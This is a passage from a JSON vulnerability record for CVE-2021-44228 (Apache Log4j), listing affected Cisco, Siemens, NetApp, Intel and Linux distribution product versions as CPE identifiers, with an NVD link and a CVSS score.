"cpe:/a:cisco:sd-wan_vmanage:20.5", "cpe:/a:cisco:evolved_programmable_network_manager:3.1", "cpe:/a:cisco:unified_workforce_optimization:11.5\$1\$", "cpe:/a:siemens:sipass_integrated:2.80", "cpe:/a:siemens:siveillance_control_pro:*", "cpe:/a:cisco:emergency_responder:11.5\$4.66000.14\$", "cpe:/a:cisco:ucs_central_software:2.0\$1l\$", "cpe:/a:cisco:optical_network_controller:1.1", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\$1\$", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.001.000", "cpe:/o:fedoraproject:fedora:35", "cpe:/o:cisco:fxos:6.7.0", "cpe:/a:siemens:energy_engage:3.1", "cpe:/a:netapp:cloud_secure_agent:-", "cpe:/a:cisco:network_dashboard_fabric_controller:11.3\$1\$", "cpe:/a:siemens:solid_edge_cam_pro:*", "cpe:/a:cisco:wan_automation_engine:7.5", "cpe:/a:siemens:opcenter_intelligence:3.2", "cpe:/a:cisco:cloudcenter_suite:4.10\$0.15\$", "cpe:/a:cisco:paging_server:8.5\$1\$", "cpe:/o:cisco:fxos:6.5.0", "cpe:/a:cisco:smart_phy:3.2.1", "cpe:/a:siemens:desigo_cc_advanced_reports:4.1", "cpe:/a:siemens:energyip:8.6", "cpe:/a:siemens:xpedition_enterprise:-", "cpe:/a:cisco:paging_server:9.0\$1\$", "cpe:/a:cisco:integrated_management_controller_supervisor:2.3.2.0", "cpe:/a:cisco:packaged_contact_center_enterprise:11.6\$1\$", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:cisco:unified_sip_proxy:010.002\$000\$", "cpe:/a:cisco:unified_sip_proxy:010.000\$000\$", "cpe:/a:cisco:smart_phy:3.1.2", "cpe:/a:siemens:desigo_cc_advanced_reports:5.1", "cpe:/a:cisco:common_services_platform_collector:002.009\$000.002\$", "cpe:/a:cisco:unified_communications_manager_im_and_presence_service:11.5\$1\$", "cpe:/a:cisco:cloudcenter_suite:5.4\$1\$", "cpe:/a:siemens:siguard_dsa:4.3", "cpe:/a:cisco:unified_customer_voice_portal:12.5\$1\$", "cpe:/a:intel:secure_device_onboard:-", "cpe:/a:apache:log4j:2.0", "cpe:/a:cisco:sd-wan_vmanage:20.7", "cpe:/a:siemens:spectrum_power_7:2.30", "cpe:/a:cisco:unified_communications_manager:11.5\$1.17900.52\$", "cpe:/a:intel:sensor_solution_firmware_development_kit:-", "cpe:/a:cisco:sd-wan_vmanage:20.8", "cpe:/a:cisco:sd-wan_vmanage:20.3", "cpe:/a:cisco:network_assurance_engine:6.0\$2.1912\$", "cpe:/a:cisco:video_surveillance_manager:7.14\$1.26\$", "cpe:/a:cisco:unified_contact_center_enterprise:12.5\$1\$", "cpe:/a:cisco:crosswork_zero_touch_provisioning:3.0.0", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.000", "cpe:/a:cisco:mobility_services_engine:-", "cpe:/a:intel:genomics_kernel_library:-", "cpe:/a:cisco:wan_automation_engine:7.2.2", "cpe:/a:cisco:network_dashboard_fabric_controller:11.2\$1\$", "cpe:/a:siemens:siveillance_vantage:*", "cpe:/a:cisco:ucs_central_software:2.0\$1b\$", "cpe:/a:cisco:unified_communications_manager:11.5\$1\$su3", "cpe:/a:cisco:automated_subsea_tuning:02.01.00", "cpe:/a:cisco:crosswork_data_gateway:3.0.0", "cpe:/a:cisco:evolved_programmable_network_manager:4.0", "cpe:/a:cisco:unified_customer_voice_portal:12.5", "cpe:/a:cisco:unified_sip_proxy:010.002\$001\$", "cpe:/a:siemens:energyip:8.5", "cpe:/a:cisco:video_surveillance_manager:7.14\$3.025\$", "cpe:/a:cisco:network_insights_for_data_center:6.0\$2.1914\$", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:siemens:desigo_cc_info_center:5.0", "cpe:/a:cisco:dna_center:2.2.2.8", "cpe:/o:cisco:fxos:6.6.0", "cpe:/a:siemens:siveillance_command:4.16.2.1", "cpe:/a:cisco:ucs_central_software:2.0", "cpe:/a:cisco:evolved_programmable_network_manager:4.1", "cpe:/a:cisco:firepower_threat_defense:7.1.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\$3\$", "cpe:/a:cisco:wan_automation_engine:7.2.3", "cpe:/a:cisco:crosswork_network_automation:3.0.0", "cpe:/a:cisco:unified_communications_manager:11.5\$1\$", "cpe:/a:cisco:smart_phy:21.3", "cpe:/a:cisco:webex_meetings_server:4.0", "cpe:/a:cisco:virtual_topology_system:2.6.6", "cpe:/a:cisco:dna_spaces_connector:-", "cpe:/a:cisco:data_center_network_manager:11.3\$1\$", "cpe:/a:siemens:captial:2019.1", "cpe:/a:cisco:common_services_platform_collector:002.009\$001.001\$", "cpe:/a:cisco:crosswork_network_automation:-", "cpe:/a:cisco:firepower_threat_defense:6.3.0", "cpe:/a:cisco:crosswork_network_automation:2.0.0", "cpe:/a:cisco:common_services_platform_collector:002.009\$000.000\$", "cpe:/a:siemens:desigo_cc_advanced_reports:4.2", "cpe:/a:cisco:enterprise_chat_and_email:12.5\$1\$", "cpe:/a:siemens:desigo_cc_advanced_reports:4.0", "cpe:/a:cisco:webex_meetings_server:3.0", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\$1.22900.6\$", "cpe:/a:intel:computer_vision_annotation_tool:-", "cpe:/a:cisco:unified_contact_center_management_portal:12.6\$1\$", "cpe:/a:cisco:cloudcenter_suite:5.3\$0\$", "cpe:/o:siemens:sppa-t3000_ses3000_firmware:*", "cpe:/a:cisco:unified_customer_voice_portal:11.6\$1\$", "cpe:/a:siemens:energyip:9.0", "cpe:/a:cisco:unified_customer_voice_portal:11.6", "cpe:/a:cisco:crosswork_network_automation:4.1.1", "cpe:/a:siemens:teamcenter:*", "cpe:/a:cisco:finesse:12.5\$1\$", "cpe:/a:cisco:identity_services_engine:2.4.0", "cpe:/a:cisco:prime_service_catalog:12.1", "cpe:/a:cisco:paging_server:8.3\$1\$", "cpe:/a:cisco:broadworks:-", "cpe:/a:cisco:wan_automation_engine:7.4", "cpe:/a:siemens:spectrum_power_4:4.70", "cpe:/a:cisco:smart_phy:3.1.3", "cpe:/a:cisco:unified_communications_manager:11.5\$1.18900.97\$", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.000.001", "cpe:/a:cisco:paging_server:9.0\$2\$", "cpe:/a:cisco:paging_server:14.0\$1\$", "cpe:/o:cisco:fxos:6.2.3", "cpe:/a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\$1\$", "cpe:/a:siemens:siguard_dsa:4.2", "cpe:/a:cisco:unified_communications_manager:11.5\$1.18119.2\$", "cpe:/a:cisco:smart_phy:3.1.4", "cpe:/a:cisco:unity_connection:11.5", "cpe:/a:cisco:identity_services_engine:002.004\$000.914\$", "cpe:/o:cisco:fxos:6.3.0", "cpe:/a:cisco:unified_contact_center_enterprise:12.0\$1\$", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.", "cpe:/a:cisco:wan_automation_engine:7.2.1", "cpe:/a:cisco:firepower_threat_defense:6.5.0", "cpe:/a:cisco:sd-wan_vmanage:20.6", "cpe:/a:cisco:unified_contact_center_express:12.6\$2\$", "cpe:/a:cisco:ucs_central_software:2.0\$1k\$", "cpe:/a:cisco:unified_intelligence_center:12.6\$1\$", "cpe:/o:debian:debian_linux:10.0", "cpe:/a:cisco:intersight_virtual_appliance:1.0.9-343", "cpe:/a:cisco:connected_mobile_experiences:-", "cpe:/a:siemens:siveillance_identity:1.5", "cpe:/o:cisco:fxos:7.1.0", "cpe:/a:cisco:paging_server:8.4\$1\$", "cpe:/a:cisco:unified_communications_manager:11.5\$1.22900.28\$", "cpe:/a:cisco:ucs_central_software:2.0\$1g\$", "cpe:/a:cisco:dna_spaces:-", "cpe:/a:cisco:wan_automation_engine:7.6", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\$2\$", "cpe:/a:cisco:sd-wan_vmanage:20.6.1", "cpe:/a:siemens:energyip_prepay:3.7", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.002.000", "cpe:/a:intel:audio_development_kit:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.005.000.000", "cpe:/a:cisco:enterprise_chat_and_email:12.0\$1\$", "cpe:/a:cisco:unified_contact_center_enterprise:11.6\$2\$", "cpe:/a:siemens:comos:*", "cpe:/a:cisco:finesse:12.6\$1\$", "cpe:/a:cisco:evolved_programmable_network_manager:4.1.1", "cpe:/a:cisco:video_surveillance_manager:7.14\$4.018\$", "cpe:/o:debian:debian_linux:11.0", "cpe:/a:cisco:fog_director:-", "cpe:/a:siemens:energyip_prepay:3.8", "cpe:/a:cisco:emergency_responder:11.5", "cpe:/o:cisco:fxos:6.4.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.5\$1\$", "cpe:/a:siemens:desigo_cc_info_center:5.1", "cpe:/a:cisco:cx_cloud_agent:001.012", "cpe:/a:cisco:sd-wan_vmanage:20.4", "cpe:/a:cisco:unified_contact_center_express:12.6\$1\$", "cpe:/a:cisco:firepower_threat_defense:6.7.0", "cpe:/a:cisco:unified_customer_voice_portal:12.0\$1\$", "cpe:/a:cisco:crosswork_platform_infrastructure:4.1.0", "cpe:/a:cisco:common_services_platform_collector:002.009\$000.001\$", "cpe:/a:siemens:siveillance_identity:1.6", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:netapp:ontap_tools:-", "cpe:/a:cisco:enterprise_chat_and_email:12.6\$1\$", "cpe:/o:cisco:fxos:7.0.0", "cpe:/a:cisco:paging_server:12.5\$2\$", "cpe:/a:cisco:wan_automation_engine:7.1.3", "cpe:/a:cisco:ucs_central_software:2.0\$1f\$", "cpe:/a:cisco:ucs_central_software:2.0\$1a\$", "cpe:/a:cisco:network_services_orchestrator:-", "cpe:/a:siemens:vesys:2019.1", "cpe:/a:cisco:unified_customer_voice_portal:12.0", "cpe:/a:cisco:network_dashboard_fabric_controller:11.4\$1\$", "cpe:/a:cisco:unified_computing_system:006.008\$001.000\$", "cpe:/a:cisco:identity_services_engine:003.002\$000.116\$", "cpe:/a:siemens:operation_scheduler:1.1.3", "cpe:/a:cisco:firepower_threat_defense:6.4.0", "cpe:/a:siemens:industrial_edge_management:*", "cpe:/a:cisco:emergency_responder:11.5\$4.65000.14\$", "cpe:/a:cisco:unified_contact_center_enterprise:12.6\$2\$", "cpe:/a:cisco:firepower_threat_defense:6.2.3", "cpe:/a:cisco:wan_automation_engine:7.3", "cpe:/a:cisco:evolved_programmable_network_manager:5.0", "cpe:/a:cisco:cloudcenter_suite:5.5\$1\$", "cpe:/a:cisco:iot_operations_dashboard:-", "cpe:/a:siemens:solid_edge_harness_design:2020", "cpe:/a:cisco:smart_phy:3.1.5", "cpe:/a:cisco:cyber_vision_sensor_management_extension:4.0.2", "cpe:/a:cisco:firepower_threat_defense:6.6.0", "cpe:/a:cisco:identity_services_engine:002.007\$000.356\$", "cpe:/a:netapp:snapcenter:-", "cpe:/a:cisco:unified_customer_voice_portal:12.6\$1\$", "cpe:/a:cisco:unified_sip_proxy:010.000\$001\$", "cpe:/a:cisco:crosswork_network_automation:4.1.0", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:siemens:nx:*", "cpe:/a:cisco:common_services_platform_collector:002.009\$001.002\$", "cpe:/a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004", "cpe:/a:siemens:sentron_powermanager:4.2", "cpe:/a:cisco:unity_connection:11.5\$1.10000.6\$", "cpe:/a:netapp:active_iq_unified_manager:-", "cpe:/a:siemens:siveillance_viewpoint:*", "cpe:/a:cisco:unified_contact_center_express:12.5\$1\$", "cpe:/a:cisco:ucs_central_software:2.0\$1h\$", "cpe:/a:siemens:desigo_cc_advanced_reports:5.0", "cpe:/a:cisco:evolved_programmable_network_manager:5.1", "cpe:/a:cisco:firepower_threat_defense:7.0.0", "cpe:/a:cisco:cloudcenter_suite:5.5\$0\$", "cpe:/a:cisco:ucs_central_software:2.0\$1e\$", "cpe:/a:cisco:identity_services_engine:002.006\$000.156\$", "cpe:/a:cisco:unified_intelligence_center:12.6\$2\$", "cpe:/a:netapp:cloud_insights:-", "cpe:/a:cisco:connected_analytics_for_network_deployment:006.004.000.003", "cpe:/a:cisco:connected_analytics_for_network_deployment:007.003.003", "cpe:/a:cisco:video_surveillance_manager:7.14\$2.26\$", "cpe:/a:cisco:integrated_management_controller_supervisor:002.003\$002.000\$", "cpe:/a:cisco:ucs_central_software:2.0\$1c\$", "cpe:/a:cisco:ucs_central_software:2.0\$1d\$", "cpe:/a:cisco:common_services_platform_collector:002.010\$000.000\$", "cpe:/a:percussion:rhythmyx:7.3.2", "cpe:/a:cisco:network_dashboard_fabric_controller:11.0\$1\$", "cpe:/a:cisco:crosswork_network_controller:3.0.0", "cpe:/a:siemens:sipass_integrated:2.85"], "id": "CVE-2021-44228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.1\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\$000.002\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_controller:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:intel:sensor_solution_firmware_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\$000\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.0\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:solid_edge_cam_pro:*:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:opcenter_intelligence:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:logo\\!_soft_comfort:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_control_pro:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sipass_integrated:2.80:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1\$:*:*:*:-:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:-:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:21.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\$1\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:optical_network_controller:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:intel:system_debugger:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.3\$0\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:-:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:sentron_powermanager:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:maintenance_release2:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_and_presence_service:11.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\$000\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:xpedition_package_integrator:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.5\$1\$:su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1k\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:siguard_dsa:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\$2\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:12.0\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:broadworks:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:4.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\$1\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:data_center_network_manager:11.3\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.7:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1.21900.40\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:vesys:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_computing_system:006.008\$001.000\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:virtual_topology_system:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1f\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.3\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.5\$1\$:su1:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1\$su3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:siveillance_viewpoint:*:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:14.0\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.003.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1\$:*:*:*:session_management:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\$2\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cyber_vision_sensor_management_extension:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager_im_\\&_presence_service:11.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.001\$000.518\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:intel:audio_development_kit:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1l\$:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:002.003\$002.000\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.1\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.5\$0\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_insights_for_data_center:6.0\$2.1914\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.002\$001\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1.18900.97\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:packaged_contact_center_enterprise:11.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:intersight_virtual_appliance:1.0.9-343:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\$1\$:es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:12.5\$2\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:finesse:12.6\$1\$:es02:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release4:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.000\$000.458\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\$000.001\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:11.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_enterprise:11.6\$2\$:*:*:*:*:*:*:*", "cpe:2.3:a:intel:computer_vision_annotation_tool:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\$4.018\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:video_surveillance_manager:7.14\$2.26\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_assurance_engine:6.0\$2.1912\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\$001.001\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:9.0\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:network_dashboard_fabric_controller:11.5\$2\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_7:2.30:-:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_insights:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1.17900.52\$:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:6.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:003.002\$000.116\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_secure_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.009\$001.000\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:teamcenter:*:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1a\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:firepower_threat_defense:6.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.5\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:evolved_programmable_network_manager:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:wan_automation_engine:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:common_services_platform_collector:002.010\$000.000\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:identity_services_engine:002.007\$000.356\$:-:*:*:*:*:*:*", "cpe:2.3:o:cisco:fxos:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release1:*:*:*:*:*:*", "cpe:2.3:a:intel:oneapi_sample_browser:-:*:*:*:*:eclipse:*:*", "cpe:2.3:a:cisco:unified_workforce_optimization:11.5\$1\$:sr7:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_customer_voice_portal:12.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_security_patch5:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1.18119.2\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:webex_meetings_server:3.0:maintenance_release3_service_pack_3:*:*:*:*:*:*", "cpe:2.3:a:cisco:paging_server:8.4\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:sd-wan_vmanage:20.7:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:industrial_edge_management:*:*:*:*:*:*:*:*", "cpe:2.3:a:intel:genomics_kernel_library:-:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:emergency_responder:11.5\$4.65000.14\$:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:head-end_system_universal_device_integration_system:*:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:spectrum_power_4:4.70:sp7:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_communications_manager:11.5\$1.22900.28\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\$1\$:es01:*:*:*:*:*:*", "cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:008.000.000.000.004:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_intelligence_center:12.6\$2\$:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.002.000:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_management_portal:12.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_sip_proxy:010.000\$001\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unity_connection:11.5\$1.10000.6\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:cloudcenter_suite:5.4\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:unified_contact_center_express:12.6\$1\$:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:ontap_tools:-:*:*:*:*:vmware_vsphere:*:*", "cpe:2.3:a:cisco:integrated_management_controller_supervisor:2.3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:smart_phy:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1h\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*", "cpe:2.3:a:siemens:energyip_prepay:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*", "cpe:2.3:a:cisco:ucs_central_software:2.0\$1b\$:*:*:*:*:*:*:*", "cpe:2.3:a:cisco:automated_subsea_tuning:02.01.00:*:*:*:*:*:*:*", 